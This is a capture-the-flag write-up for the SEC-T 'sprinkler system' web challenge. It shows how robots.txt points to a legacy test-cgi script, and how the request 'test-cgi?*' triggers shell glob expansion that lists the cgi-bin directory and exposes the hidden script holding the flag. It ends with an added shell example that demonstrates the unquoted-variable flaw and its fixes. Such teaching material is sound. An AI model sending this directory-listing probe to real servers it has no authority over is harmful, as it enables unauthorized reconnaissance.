[sec-t ctf] – sprinkler system (web 100) writeup

Damn new york… some chick tricked you into standing in the rain on the very first day… it’s payback time!

Service: http://sprinklers.alieni.se/

Author: avlidienbrunn

Solution

Trying robots.txt first gives:

User-agent: *
Disallow: /cgi-bin/test-cgi

Visiting http://sprinklers.alieni.se/cgi-bin/test-cgi returns the following:

CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
REMOTE_HOST =
REMOTE_ADDR = x.x.x.x
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

A quick search for "test-cgi vulnerability" turns up its well-known directory listing problem (reference: this article). Appending * as the URL query makes QUERY_STRING show the names of every file and directory in the script's current working directory.

http://sprinklers.alieni.se/cgi-bin/test-cgi?*

QUERY_STRING = enable_sprinkler_system test-cgi

Visiting http://sprinklers.alieni.se/cgi-bin/enable_sprinkler_system gives the flag.

Flag: SECT{[email protected]_A_l3ak!-}
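Why the listing leaks, shown as an added example that is not part of the writeup or the challenge's own script: the classic test-cgi echoed its variables unquoted, so a QUERY_STRING of `*` was subject to shell pathname expansion inside cgi-bin. The script below builds a constructed directory with the two file names from the writeup and compares the unquoted (vulnerable) echo against the quoted (fixed) one; the function names and the temporary directory are assumptions of this example.

```shell
#!/bin/sh
# Added example: unquoted variable expansion in a CGI shell script.
# Constructed directory standing in for /cgi-bin, with the two file
# names the writeup observed.
setup_fake_cgibin() {
    dir=$(mktemp -d)
    : > "$dir/enable_sprinkler_system"
    : > "$dir/test-cgi"
    printf '%s\n' "$dir"
}

# Vulnerable form, as in the historical test-cgi: $QUERY_STRING is
# unquoted, so a value of "*" is word-split and glob-expanded against
# the script's working directory before echo ever sees it.
render_unquoted() {
    # $1 = working directory, $2 = simulated QUERY_STRING
    QUERY_STRING=$2
    ( cd "$1" && echo QUERY_STRING = $QUERY_STRING )
}

# Fixed form: double quotes suppress word splitting and pathname
# expansion, so the query string is printed literally. ShellCheck
# flags the unquoted variant as SC2086.
render_quoted() {
    QUERY_STRING=$2
    ( cd "$1" && echo "QUERY_STRING = $QUERY_STRING" )
}

# Defense in depth: a script that never wants globbing can turn it off
# globally with set -f, which also neutralises the unquoted form.
render_noglob() {
    QUERY_STRING=$2
    ( cd "$1" && set -f && echo QUERY_STRING = $QUERY_STRING )
}

# Demonstration when run directly.
d=$(setup_fake_cgibin)
render_unquoted "$d" '*'   # leaks: enable_sprinkler_system test-cgi
render_quoted "$d" '*'     # prints: *
render_noglob "$d" '*'     # prints: *
rm -rf "$d"
```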